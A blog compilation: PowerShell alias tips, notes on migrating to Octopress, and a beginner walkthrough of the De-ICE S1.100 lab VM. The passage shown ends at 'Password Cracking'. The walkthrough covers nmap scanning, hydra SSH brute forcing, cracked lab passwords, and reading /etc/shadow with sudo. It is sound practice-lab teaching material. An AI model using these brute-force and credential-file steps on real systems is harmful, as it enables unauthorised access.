Running Windows as a main OS can be tough for many hardcore Linux users, especially when you want some command line power. PowerShell looks alien at first glance, but on closer inspection it’s not a million miles away from what you can achieve in a Bash shell.

If you’re like me you’ll have a few handy aliases that save a bit of time whilst working in your Linux environment. For example, the aliases below save having to type out long commands that you may use quite often:

alias lsa="ls -lsahS"

alias screen="screen -xRR"

alias ..="cd .."
alias ...="cd ../.."
alias ....="cd ../../.."
alias .....="cd ../../../.."

alias upd="sudo apt-get update"
alias upg="sudo apt-get upgrade"
alias ins="sudo apt-get install"
alias rem="sudo apt-get purge"
alias fix="sudo apt-get install -f"

If you find yourself dropping into a Linux virtual machine to use the command line functionality you may be surprised to learn that a lot of the same functionality can be achieved with PowerShell. PowerShell handles everything as an object which makes piping between commands very powerful. For example, if I want to return the full path for every file in the current directory I could do the following:

Get-ChildItem | Select-Object fullname

Each file returned is piped to the select command to get the fullname attribute of the file object.
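By contrast, a Unix pipeline passes plain text rather than objects, so producing the same listing means assembling the strings yourself. A rough sketch, using a throwaway demo directory:

```shell
# make a throwaway directory with two files to list
mkdir -p demo && touch demo/a.txt demo/b.txt
# build the full path of each entry by hand from the shell
for f in demo/*; do echo "$PWD/$f"; done
```

In PowerShell the full path is a property you select; in Bash it’s a string you construct.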

It’s worth learning about the PowerShell equivalents of some of the commands you might run in a Linux shell. Below I’ve put some of the more familiar Linux command line binaries and their PowerShell counterparts.

Listing running processes


ps


Get-Process

Stopping a process


pkill calc


Get-Process calc | Stop-Process

Displaying a list of 1 to 10


seq 1 10


1..10

Print the first 10 lines of a file


head -n10 file.txt


gc file.txt | select -first 10

Print the last 10 lines of a file


tail -n10 file.txt


gc file.txt | select -last 10 

Count the lines in a file


wc -l file.txt


gc file.txt | Measure-Object -Line 

Print lines that contain the word “example”


grep example file.txt


Select-String example file.txt

Split file using “:” as a delimiter and print the second item


awk -F ":" '{print $2}' file.txt


gc file.txt | %{ $_.Split(':')[1]; }
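To see the field indexing in action, here’s a quick run against some throwaway colon-delimited data (note that awk numbers fields from 1, while the array returned by PowerShell’s Split is indexed from 0):

```shell
# two sample lines in passwd-like colon format
printf 'root:x:0\nbin:x:1\n' > sample.txt
# $2 is the second colon-separated field of each line
awk -F ":" '{print $2}' sample.txt
```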

Replace the word “example” with “elpmaxe” in file.txt


cat file.txt | sed 's/example/elpmaxe/'


gc file.txt | %{ $_ -replace 'example', 'elpmaxe' }

There are actually a lot of built-in aliases in PowerShell already, so if you find yourself loathing some long command string you might be pleased to know that there is probably already a shortcut for it. You can find out what these are with the following command:

Get-Alias

As you can see there are a few items in the list that will be familiar to you if you are from a Linux background. Aliases such as ls, cat and rm are just a few examples that you won’t need to re-learn (or set up) for PowerShell. Remember that command at the start where I grabbed the full path for each file in the directory? It could have been simplified using these built-in aliases.

ls | select fullname

That’s not so much of a pain to type is it?

Setting up your PowerShell profile

For practice I’ll go through setting up the profile (mostly) in PowerShell. The PowerShell environment tries to load your profile information from a file whose location (which may differ between Windows versions) is stored in the PowerShell environment variable $PROFILE. Let’s use this variable to create the file:

New-Item -type file -force $PROFILE

Hooray, we’ve just made a PowerShell profile file.

Adding aliases to our PowerShell profile file

Let’s open up that file from within PowerShell because we’re gurus now:

notepad $PROFILE

In a .bashrc/.bash_aliases file an alias can carry arguments along with the command; unfortunately this isn’t possible with PowerShell aliases. You must first define a function, then use the New-Alias command to tie the function name to an alias that we can type into the prompt.

With the open file let’s add some aliases:

How about a quick alias to run ipconfig:

New-Alias -name ip -value ipconfig

If you want to do ipconfig /all the following would be required as you are supplying the name of the command and an argument:

function ipconfig_all_function() {
    ipconfig /all
}
New-Alias -name ipa -value ipconfig_all_function

Change to your $HOME directory:

function cd_home_function() {
    cd $HOME
}
New-Alias -name home -value cd_home_function

Maybe a shortcut to open notepad if you’re in a console window:

New-Alias -name n -value notepad

Being lazy is cool remember:

function exit_function() {
    exit
}
New-Alias -name x -value exit_function

Once you have some aliases in your profile file, just save it, open a new PowerShell instance and test them out! You’ll get an error if something is wrong in the file, so you’ll be able to correct it.

The aliases above are pretty simple. Here is one I’ve made that sets up a git repository with some local configuration settings. This can be useful if you have multiple git servers using different user names and e-mails assigned to them.

function gitinb_function() {
    git init
    git config --local NullModeBitbucket
    git config --local
}
New-Alias -name gitinb -value gitinb_function

function giting_function() {
    git init
    git config --local NullModeGithub
    git config --local
}
New-Alias -name giting -value giting_function

More customization

Here are a couple of places you can go to read about aliases and profile customization that you may wish to incorporate into your own profile file:

Bonus information!

There are some special locations you can get to within PowerShell. I thought I’d include them here while I remember, as maybe someone will find them useful.

View the windows environment variables:

cd env:

View the Windows registry hives:

cd HKLM:

If you want to find out about a particular item in one of these locations you can do the following (remember that tab completion through the items is possible):

echo $Env:OS


Thanks to @lllamaboy for giving me the first steps on setting up a PowerShell $PROFILE and letting me in on the whole special-location thing.

So, a friend of mine was talking about this thing called Octopress and how he was moving his blogspot content across to it. I toiled for a while thinking that it wasn’t something I needed to do right now, but in the end I gave in and spent an evening moving my own blog across (I only had 2 posts before this so I assumed it would be quick, and I was right). There are plenty of blogs describing the process of setting up an Octopress site using GitHub Pages, so rather than regurgitate others’ material I’ll talk about the bits that I got stuck with. But first…

Why did I move?

It’s not hard to notice that I’ve only got two other posts on this blog. There are a couple of reasons for that. The main one is that I don’t like to repeat content that’s already out on the net. I’ve had a few things to talk about previously, but after having a look around it had already been done before, so why copy what’s out there? Secondly, the sort of posts that I would like to write (like my De-Ice guide) would be in depth. Whilst I do enjoy blogging, blogspot was a pain to use: making everything look pretty with its formatting was tedious and slow, which made me too reluctant (or lazy) to write big blog posts.

Not so long ago I had been updating the files in my GitHub repositories using a tool called MarkdownPad2. In the git fashion, I was writing the markdown locally and previewing the output in MarkdownPad before pushing. After finding out how Octopress works, the way I could push blog posts out was more appealing: I could create pages offline, work on them offline and preview the generated output offline, all before pushing to GitHub, and without needing a glorified notepad-ish tool. All along with simple and to-the-point formatting. Huzzah.

What is Octopress anyway?

For those who don’t know what Octopress is, here’s a small run down. Octopress is a Ruby application that is essentially a framework for Jekyll: a static website generator. The generated content can then be pushed up to a repository on GitHub, and you can use GitHub Pages to host it. Visiting the Octopress site will give you some more information about Octopress.

So what is markdown?

Markdown is a language created for the sole purpose of allowing people “to write using an easy-to-read, easy-to-write plain text format, and optionally convert it to structurally valid XHTML (or HTML)”. The syntax is so basic that it makes knocking up a simple page (such as a readme file for a GitHub repository) trivial.
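As a taste of the syntax, here are a few common constructs (the content is just an illustration):

```markdown
# A heading

Some *emphasised* text, some **bold** text and a [link](https://example.com).

- a bullet point
- another bullet point
```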

Windows installation

The main bulk of my installation came from following the two guides below. This includes setting up: titles, a custom theme, adding posts and adding pages:


Since I already had Ruby (mostly) installed on my system, all I needed was to download and install the DevKit, which is required for Octopress. The DevKit can be found on the RubyInstaller website (make sure you get the correct version for your Ruby install).

Bundle exec

On my shell in Windows I was getting an error because the wrong version of rake was installed. Anyone who knows what they’re doing with Ruby knows that they can run the required version by using bundle exec (I had to look this up because I don’t normally work with Ruby):

> rake new_post["My move to Octopress"]
You have already activated rake 10.1.0, but your Gemfile requires rake
Using bundle exec may solve this.

Simply prepend your commands within the application with “bundle exec”, like so:

> bundle exec rake new_post["My move to Octopress"]

Adding a twitter recent tweet box

After being disappointed that a twitter box didn’t appear after filling in my details in the configuration file I was pointed to Jmac’s post on how to put twitter back into Octopress. The guide was pretty easy to follow, although I removed the following line from the twitter.html page as it wasn’t required for my theme:


Custom favicon in Octopress

I wanted to use my old blog’s favicon on my Octopress site. Presumably it would be a copy and paste win; however, Octopress likes to have the favicon as a png file (yes, you could edit some html to include the ico, but the following was faster for my lazy brain somehow). The main solution was found at the end of this post. Firstly I went to my old site (before the CNAME part below, if you skipped ahead) and downloaded the favicon. I then needed to convert my .ico to a .png file. Since I couldn’t be bothered to use some fancy image library for converting the .ico, which had been mentioned in a few guides, I simply used an online converter. With this new favicon.png in hand, I added it to my source/ folder and ran bundle exec rake generate, which added the favicon to my generated code.

Pointing a custom domain to your GitHub Pages site

Most people want to have a custom domain pointing to their blog. The steps for this are really simple; GangMax and GitHub both have good guides on how to do it. However, remember how I said I was on Windows? On my command line (PowerShell by default) I ran the following:

> echo blog.nullmode.com > source/CNAME

That should be okay? Right? Well no. When I deployed my site with the new CNAME file I got an e-mail from GitHub:

The page build completed successfully, but returned the following warning:

Bad CNAME format: ÿþb l o g . n u l l m o d e . c o m

Weird, right? Well, it turns out that when piping into a file PowerShell uses the encoding UCS-2 Little Endian (checked with Notepad++ on the Encoding tab). To fix this I did the following in Notepad++: open said file, click Encoding, select Convert to UTF-8 without BOM, and save. It turns out that the old fashioned Command Prompt pipes into the CNAME file using the correct encoding. Committing and redeploying after changing the encoding fixed this error.
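The mangled characters make sense once you look at the bytes. A UCS-2/UTF-16 Little Endian file starts with the byte-order mark 0xFF 0xFE, which renders as “ÿþ” when read as Latin-1, and each ASCII character is followed by a NUL byte, which is where the spaces between the letters come from. A quick sketch of the same failure mode (hypothetical file name):

```shell
# write "blog" the way PowerShell's > redirection does: UTF-16 LE with a BOM
# (octal \377\376 is the BOM 0xFF 0xFE; each letter is followed by a NUL byte)
printf '\377\376b\000l\000o\000g\000' > cname_utf16
# the first two bytes are the byte-order mark that GitHub choked on
head -c 2 cname_utf16 | od -An -tx1
```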


About De-ICE S1.100 (Level 1)

This machine is very good for those looking to get their teeth into learning some simple penetration testing techniques. It allows newcomers to have a play with some common tools that are used in many penetration tests. In this guide I will go into some detail to help beginners understand these tools. My aim is to explain why each tool was picked for the task and how to use it at a basic level.

Things to Remember

Throughout the guide I will reference several tools. If you wish to find out more about a tool and the options it has available, the following command should aid you. Use it whenever you get stuck with an application.


man <application>
man netdiscover
man nmap 

If you still find yourself stuck or have questions then crack out Google. Research, take notes, and learn. Do not take short cuts by not reading sections or dismissing stuff you don’t understand, you will fail in the long run. People will also be less likely to help you if you’ve not given a challenge your best shot already.


Download information and network setup can be found on Vulnhub. I typically recommend running Kali or Backtrack in one virtual machine and the De-Ice in another. In this guide I use Kali Linux. If you get stuck setting up your virtual machines, check out Vulnhub’s comprehensive guide. For this particular machine your attacking box will need to be in the same network range.


Throughout this blog post I’m going to use the word enumeration a lot. In computer security, enumeration is the process of finding out as much information about a target as possible, then sorting through that information to prioritise possible leads which may help with a successful breach. This gathering of information is the key to a successful attack and I cannot stress enough how important it is.

Target Discovery

In our case we can’t target the machine yet because we don’t know the machine’s IP address. Therefore finding the IP is the first task. If the setup of the virtual machine went according to plan you should be able to run the netdiscover command to scan for active IP addresses on the same subnet.

root@kali ~$ netdiscover
Currently scanning:   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180

   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
                 00:50:56:c0:00:01    01    060   VMWare, Inc.
                 00:0c:29:49:2d:4c    01    060   VMware, Inc.
                 00:50:56:f5:1b:d6    01    060   VMWare, Inc.

The command netdiscover sends out ARP (Address Resolution Protocol) requests to locate active machines on a network subnet. ARP is used to aid communication in IP-based networks: ARP requests are sent to confirm a node’s MAC address so communication between two machines can occur. The tool sends an ARP request for each IP address in each subnet range being scanned; if a node responds with a MAC address, a machine is alive on the requested IP address. netdiscover also works through switched networks, and when the above command is run you will see it go through multiple subnets checking for active machines.

As you can see, we receive a response from three machines. What we now want to do is find out which is our target box. In this case the machine has been hard-coded with an IP address, but it’s good practice to scan all the machines found (which is what you’d do in a real-life situation!).

Service Enumeration

The first and arguably the most important part of any penetration test is scanning the machine to find which services are running on it. Some of the questions you will need to answer are:

  • What services are running on the target?
  • What version are they running?
  • Are there any plugins attached to the services?
  • What versions are the plugins?
  • Are you able to identify any service misconfiguration?
  • Is there a web server?
  • Is it off the shelf? (e.g. WordPress)
  • Version?
  • Plugins and Versions?
  • Misconfigured?

Enumeration is the key! Don’t get ahead of yourself by attacking the box the moment you find something that could be exploited. This is a mistake a lot of newcomers make, and they end up going back to the start.

We are going to use nmap to scan each address. The nmap program is one of the bread and butter applications you need to know about. It has a wide array of functions and options which can be used in different circumstances and situations.

To start with, let’s scan the found addresses. We can use a “,” to add multiple IP addresses into one scan like so:

root@kali ~$ nmap,100,254                                     

Starting Nmap 6.25 ( ) at 2013-07-28 20:56 EDT
Nmap scan report for
Host is up (0.00030s latency).
Not shown: 999 filtered ports
80/tcp open  http
MAC Address: 00:50:56:C0:00:01 (VMware)

Nmap scan report for
Host is up (0.00017s latency).
Not shown: 992 filtered ports
20/tcp  closed ftp-data
21/tcp  open   ftp
22/tcp  open   ssh
25/tcp  open   smtp
80/tcp  open   http
110/tcp open   pop3
143/tcp open   imap
443/tcp closed https
MAC Address: 00:0C:29:49:2D:4C (VMware)

Nmap scan report for
Host is up (0.000058s latency).
All 1000 scanned ports on are filtered
MAC Address: 00:50:56:F5:1B:D6 (VMware)

Nmap done: 3 IP addresses (3 hosts up) scanned in 21.75 seconds

As you can see from scanning, we have found what looks to be our target machine. The default nmap scan checks 1000 ports out of the 65535 total, and it also shows what application runs on each port by default. To get more specific we can run a more comprehensive nmap command against the target:

root@kali ~$ nmap -sS -Pn -sV -O -p 20,21,22,25,80,110,143,443                   

Starting Nmap 6.25 ( ) at 2013-07-28 21:37 EDT
Nmap scan report for
Host is up (0.00026s latency).
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
25/tcp  open   smtp?
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
443/tcp closed https
MAC Address: 00:0C:29:49:2D:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 183.57 seconds

Let’s breakdown the options used:

  • -sS This is the default scan method for nmap. It’s called a SYN scan. When a machine wishes to communicate with another machine using TCP they must complete the TCP handshake. Nmap sends a SYN TCP packet to the target address, if the target responds with the SYN ACK packet, the port is determined as open. Nmap will not complete the handshake by sending the ACK packet back to the target, so it’s moderately stealthy.
  • -Pn This wasn’t needed in this instance but I generally include it with single-target scans. This option skips nmap’s host discovery. When performing a scan across multiple IPs, nmap will split the targets up according to how “active” they are deemed to be from an initial response. Supplying this option skips that initial discovery and runs all options against every given IP address.
  • -sV This option probes open ports for more information to help identify the service and the version.
  • -O Operating System Detection. In this case we know that the target is a Linux-based OS already; however, it doesn’t hurt to run with this option just for practice. This mode sends multiple TCP and UDP packets to the target, and the results are cross-referenced with a database of collected signatures to help identify the operating system of the machine. Be warned, these results can be misleading at times.
  • -p It is often prudent to do an initial scan across a range of IP addresses to pick out the running ports (like we did in our first nmap scan) then target the found open ports in another more intrusive scan. For this command the ports are listed afterwards separated by commas.

We now have a list of ports open, and an almost complete list of services and version numbers. What might be confusing here is that some ports are listed as closed. Wait, surely ports wouldn’t be listed if they are closed? What nmap is actually saying is that the port is reachable, but there is no application listening on it to communicate with.

Before we compile our list so far, I want to quickly cover something else that can often reveal more information about a target. Let’s scan again with the -A option:

root@kali ~$ nmap -sS -Pn -sV -O -A -p 20,21,22,25,80,110,143,443                

Starting Nmap 6.25 ( ) at 2013-07-28 21:42 EDT
Nmap scan report for
Host is up (0.00021s latency).
20/tcp  closed ftp-data
21/tcp  open   ftp      vsftpd (broken: could not bind listening IPv4 socket)
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
|_sshv1: Server supports SSHv1
25/tcp  open   smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
| imap-capabilities: 
|_  ERROR: Failed to connect to server
443/tcp closed https
MAC Address: 00:0C:29:49:2D:4C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix

1   0.21 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 193.72 seconds

As you can see, the -A option does some additional enumeration on the ports and also gives us a traceroute to the target. In fact, -A enables a lot of things: OS detection (-O), version detection (-sV), script scanning (-sC) and traceroute (--traceroute). Traceroute simply shows the path that is taken to the target server. Script scanning makes use of nmap’s scripting engine to probe ports for more information. For example, in the above scan result we can see that the http-title check for the web page on port 80 has been returned to us; it also helps us see that there could be a problem with the mail server on port 25, the FTP server on port 21 and the IMAP service on port 143. Using scripts like this can be useful, especially when you are targeting a single machine or a handful. Using scripts on a large scan can increase the scan time and the amount of information to sort through.

Running services:

  • Port 21 FTP vsftpd Version ?
  • Port 22 SSH OpenSSH Version 4.3
  • Port 25 SMTP Service? Version ?
  • Port 80 HTTP Apache Version 2.0.55 (Also running PHP version 5.1.2)
  • Port 110 POP3 Openwall popa3d Version ?
  • Port 143 IMAP UW Imapd 2004.357

So it looks like we are missing some version numbers. Is that important? It sure is, as one of these services might be vulnerable. Without knowing what versions are running we would be firing random exploits at them, which is time consuming and often unreliable.

Banner Grabbing and Finger Printing

I am adding a small section here to cover these two terms, as they should be learnt by the novice penetration tester. When doing a comprehensive scan with nmap (particularly with the -sV option), nmap will probe open ports to build a fingerprint of each service. This fingerprint is then compared against an ever-growing database of fingerprints to try to match the port up to a service and running version. This act of probing a port to retrieve a service name and version is finger printing.

Banner grabbing is essentially part of the finger printing process. It can be done manually, and it’s worth learning how in some cases. Often, when connecting to a service, a message will be transmitted displaying the service name and possibly a version number. This connect-and-view step is used by nmap to help determine the fingerprint of a service. Of course, this is only easily done by a user when connecting to a port running a text-based protocol.

As an example we are going to use the program netcat to banner grab the HTTP port. Netcat is known as the Swiss army knife of TCP/UDP connections: it is a tool that is able to read and write network connections using the TCP or UDP protocol. Covering the complete uses of this tool is out of the scope of this article, but I do suggest you do some research on it if it’s new to you.

Below shows one possibility of banner grabbing the target machines web port.

root@kali ~$ nc -nvv 80 
(UNKNOWN) [] 80 (http) open

HTTP/1.1 400 Bad Request
Date: Mon, 12 Aug 2013 22:43:50
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Connection: close
Content-Type: text/html; charset=iso-8859-1

Let’s break the process down:

nc -nvv 80

  • Using netcat, connect to the target on port 80
  • The option n states that only IP addressing will be used, no DNS lookups
  • The option vv makes netcat provide extra verbosity

(UNKNOWN) [] 80 (http) open

Once the connection has been established the above message will be shown


HEAD / HTTP/1.1

  • HEAD is the HTTP method which requests only the page’s headers, not the full body
  • / indicates the main page of the site, or the root location of a site
  • HTTP/1.1 defines the HTTP version to make the request with
  • There must be two carriage returns to submit a command in an HTTP request (press ENTER/RETURN twice)

The returned response shows a web server version (Apache/2.0.55), the type of system it has been compiled for (Unix) and even the PHP version that is running on the machine (PHP/5.1.2). It’s worth noting at this point that any competent system administrator could alter the banners presented by services to mask their true versions or even service types.
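You can check the terminating blank line at the byte level; the request ends with two CR LF pairs, which od -c shows as \r and \n:

```shell
# dump the raw bytes of a minimal HEAD request
printf 'HEAD / HTTP/1.1\r\n\r\n' | od -c
```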

Other HTTP header fields are returned, such as Date and Content-Type. Learning about HTTP header fields is a must; I recommend doing some quick googling and reviewing the different types and what they do. Headers of interest are: User-Agent, Content-Type, Cookie, Referer.

Website Enumeration

Enumerating web applications is a MASSIVE area. I recommend reading the Web Application Hacker’s Handbook, 2nd Edition for an in-depth look at web applications and how to tackle them. Fortunately we can find some very useful information on the target machine’s website without having to look far. The page contains some information about the vulnerable machine. At the bottom of the page there is a link to Game Related Pages, which contains some information about the fake company.

Using the information provided you can compile a list of e-mail addresses:

You can also compile a list of possible user names (not forgetting some default ones):


Gathering such information is essential when profiling an organisation. With a large list of user names it’s possible to do a large-scale login attempt where each user is tried with just one or two candidate passwords, using the same passwords for every account tested. In a very large organisation it is likely that a popular password will be used by at least one user.
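The idea can be sketched as a simple loop; the user names and passwords below are made up for illustration, and a real run would feed the attempts to a tool such as hydra rather than echo them:

```shell
# hypothetical user list gathered during enumeration
users="aadams bbanter ccoffee"
# spray each account with just one or two likely passwords
for u in $users; do
  for p in password1 companyname1; do
    echo "would try $u:$p"
  done
done
```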

Attacking the Box

Now we have armed ourselves with information about the machine let’s run through what we know and attempt to find possible ways into the system.

Searching for exploits can be done in many ways. In this case Kali gives a newcomer a couple of options: the searchsploit command and Metasploit. The searchsploit command searches through the exploit-db database that is stored locally on Kali. Searching for exploits in Metasploit can be achieved by first running the program with msfconsole, then running the search command. As well as these commands, the Internet is also a valuable place to check for exploits that are not in exploit-db or do not have Metasploit modules written for them. Remember to be thorough when searching for exploits. As this isn’t a perfect world and there is no naming convention, some exploits listed will affect previous versions and may not appear in your initial search results. It may be worth double checking on various vulnerability listing websites whether the version of the found service is vulnerable. CVE Details is a nice site that is generally good for checking vulnerabilities.

Searchsploit example:

root@kali ~$ searchsploit openssh 4.3                                                                                                      
Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit       /multiple/dos/ 

Metasploit example:

root@kali ~$ msfconsole -q                                                                                                                 
msf > search openssh

Matching Modules

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/windows/local/trusted_service_path  2001-10-25       excellent  Windows Service Trusted Path Privilege Escalation
   post/multi/gather/ssh_creds                                  normal     Multi Gather OpenSSH PKI Credentials Collection

  • Port 21 FTP – vsftpd – Version ? From the nmap scan it seems that the service is failing to run correctly, so it is unlikely to be exploitable
  • Port 22 SSH – OpenSSH – Version 4.3 Only denial of service exploits found
  • Port 25 SMTP – Service? – Version ? The port doesn’t seem to interact with manual commands. You can confirm this later with banner grabbing and finger printing techniques
  • Port 80 HTTP – Apache – Version 2.0.55 – PHP version 5.1.2 No suitable exploits found
  • Port 110 POP3 – Openwall popa3d – Version ? Unable to finger print the server for an exact version
  • Port 143 IMAP – UW Imapd 2004.357 Unable to finger print the server for an exact version

So we couldn’t make much progress in exploiting the services for remote access. We can, however, revert to the information we pulled off the website. Using a brute forcing program we can enumerate some of the active services on the machine and see if we can gain access. Hydra is a great program for this sort of task: it is able to brute force a wide variety of common protocols quickly and has a threading option to increase speed.

root@kali ~$ hydra -L users.txt -P users.txt ssh
Hydra ( starting at 2013-08-12 20:22:25
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 server, 1369 login tries (l:37/p:37), ~85 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 1259 todo in 00:12h, 6 active
[STATUS] 87.67 tries/min, 263 tries in 00:03h, 1106 todo in 00:13h, 6 active
[STATUS] 84.86 tries/min, 594 tries in 00:07h, 775 todo in 00:10h, 6 active
  [22][ssh] host:   login: bbanter   password: bbanter
[STATUS] 86.67 tries/min, 1040 tries in 00:12h, 329 todo in 00:04h, 6 active

After a while you will see that the scan picked up an account using its user name as its password. Before we rush ahead, let’s quickly break down the hydra command:

  • -L users.txt – User names to test
  • -P users.txt – Passwords to test, in this case we are checking to see if users have used their (or anyone else’s) user names as passwords
  • – The target IP address
  • ssh – The target protocol

Now we are armed with a user name and password that we can use to SSH into the target machine. When prompted for a password, enter bbanter.

root@kali ~$ ssh bbanter@

So we’re in the machine, what now? Well, this is where more enumeration is required. I will explain some of the important commands to gather information about the target. The goal here is to profile the machine from the inside and prioritise where it might be good to start targeting. My favourite reference for Linux privilege escalation is by g0tmi1k. Please be aware that these commands may not work for every distribution of Linux. My suggestion here is to run the commands and see what you get. For some more work and self-learning, try running a few more from the guide I linked above. This process can be painstaking, but that is normal. Power through!

To start with it’s good to see what kernel version is running. This could lead us onto a privilege escalation exploit depending on the version returned:

bbanter@slax:~$ uname -a 

It’s good to list what processes are running as it helps select possible entry points in the system.

bbanter@slax:~$ ps aux

Processes running as root are good to identify, as compromising one of these may give you root access over the machine:

bbanter@slax:~$ ps aux | grep root

Finding out what ports are open and what programs are listening on them can assist in finding a service to exploit. However identifying the service listening often requires root access. It’s worth a look though:

bbanter@slax:~$ netstat -antup

Finding out what other users are on the system may assist in getting in again, but with elevated privileges:

bbanter@slax:~$ cat /etc/passwd

Finding out about the user groups on the system can also be useful for identifying users with sudo access.

bbanter@slax:~$ cat /etc/group

If you have access, the following command will output the shadow file of the system: a list of users with their respective password hashes. Reading it usually requires root:

bbanter@slax:~$ cat /etc/shadow
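If you find yourself running these checks on every box, you can bundle them into a rough helper and save the output for later review. A sketch, assuming a POSIX shell on the target (file name and section labels are my own):

```shell
#!/bin/sh
# Rough local-enumeration helper: run each check and dump everything
# into one file to review later. Some commands will fail without root
# (or may not exist on a given distro); we keep whatever we can get.
out=/tmp/enum-$(id -un).txt
{
    echo "== kernel ==";    uname -a 2>/dev/null
    echo "== processes =="; ps aux 2>/dev/null
    echo "== listening =="; netstat -antup 2>/dev/null
    echo "== users ==";     cat /etc/passwd 2>/dev/null
    echo "== groups ==";    cat /etc/group 2>/dev/null
    echo "== shadow ==";    cat /etc/shadow 2>/dev/null
} > "$out"
echo "results saved to $out"
```

Having one file per user you compromise makes it much easier to compare what each account can and cannot see.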

Generally speaking this user is pretty well locked down. The kernel version has some vulnerabilities but nothing that will give us access to root. The useful output is from the following commands:

bbanter@slax:~$ cat /etc/passwd
rpc:x:32:32:RPC portmap user:/:/bin/false
bbanter@slax:/home/aadams$ cat /etc/group 

So from these commands we can determine the following:

  • bbanter and ccoffee are part of the users group
  • aadams is part of the wheel group

Users seems like a pretty standard group, but what about wheel? The wheel group historically gives users access to restricted commands. In modern UNIX systems (such as Linux) it gives users access to the su and sudo commands in order to run commands as the root user. This means that, out of the users we could potentially get into, aadams is the most favourable.
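A quick way to pull the interesting part out of /etc/group: each line is name:password:GID:comma-separated-members, so the fourth field lists the supplementary members. An illustration with a sample line (the line itself is made up to mirror what we saw on the box):

```shell
# /etc/group format: name:password:GID:members
# The fourth field holds the supplementary members of the group.
line='wheel:x:10:root,aadams'
echo "$line" | cut -d: -f4
```

On a real system you would feed `grep '^wheel:' /etc/group` into the same cut.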

We can use hydra again with a few extra options. The main difference here is that we will be using a more comprehensive word list that covers a lot of common passwords.

root@kali ~$ hydra -l aadams -P /usr/share/wordlists/rockyou.txt -e nsr -u -t 128 ssh
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra ( starting at 2013-08-13 23:55:47
[DATA] 128 tasks, 1 server, 14344401 login tries (l:1/p:14344401), ~112065 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 438.00 tries/min, 438 tries in 00:01h, 14343963 todo in 545:49h, 128 active
[STATUS] 386.00 tries/min, 1158 tries in 00:03h, 14343243 todo in 619:19h, 128 active
[STATUS] 354.00 tries/min, 2478 tries in 00:07h, 14341923 todo in 675:14h, 128 active
[STATUS] 349.27 tries/min, 5239 tries in 00:15h, 14339162 todo in 684:16h, 128 active
[STATUS] 339.68 tries/min, 10530 tries in 00:31h, 14333871 todo in 703:19h, 128 active
[STATUS] 338.70 tries/min, 15919 tries in 00:47h, 14328482 todo in 705:05h, 128 active
[STATUS] 338.40 tries/min, 21319 tries in 01:03h, 14323082 todo in 705:27h, 128 active
[STATUS] 338.97 tries/min, 26779 tries in 01:19h, 14317622 todo in 703:59h, 128 active
[STATUS] 338.73 tries/min, 32179 tries in 01:35h, 14312222 todo in 704:14h, 128 active
[22][ssh] host:   login: aadams   password: nostradamus

This hydra command looks a bit more complex, but it’s pretty straightforward:

  • -l aadams Where aadams is the user we’re testing
  • -P /usr/share/wordlists/rockyou.txt This is a really good word list full of common base words and common passwords. It is shipped with Kali by default.
  • -u This option makes hydra loop over users first: each password is tried against every user before moving on to the next password, rather than exhausting the whole word list against one user at a time.
  • -t 128 This is how many parallel tasks you want hydra to run. Increasing this value can give you more speed when brute forcing as more attempts run at once.
  • -e nsr This parameter enables a few extra checks:
    • n test for a null password
    • s test the user name as the password
    • r test the reversed user name as the password
  • – The target IP address
  • ssh – The target protocol
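To picture what -u changes, here is the try order it imposes, sketched with plain shell loops (this is just an illustration of the ordering, not hydra itself; the user and password names are made up):

```shell
# -u puts passwords on the outer loop and users on the inner loop,
# so each password is tried against every user before moving on.
order=""
for p in pass1 pass2; do        # passwords on the outside
    for u in alice bob; do      # users on the inside
        order="${order:+$order }$u:$p"
    done
done
echo "$order"
```

Spreading attempts across users like this also tends to be gentler on per-account lockout policies.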

We can now login to aadams with the password nostradamus.

root@kali ~$ ssh aadams@

Again we need to enumerate this user and see what we can find out. Try running the commands from before and check the outputs.

The command that should have shown something interesting should have been:

aadams@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

User aadams may run the following commands on this host:
    (root) NOEXEC: /bin/ls
    (root) NOEXEC: /usr/bin/cat
    (root) NOEXEC: /usr/bin/more
    (root) NOEXEC: !/usr/bin/su *root*

So what does this tell us? It tells us that aadams has some sudo access on the machine, i.e. can run certain commands as root. Remember before when we tried to view the shadow file and got a permission denied message? Well, let’s try that again with sudo:

aadams@slax:~$ sudo cat /etc/shadow  

Great! We now have hashes of the users on the system. Our main target is to gain root access on the machine, so to do this we need to find out what the root password is.

Password Cracking

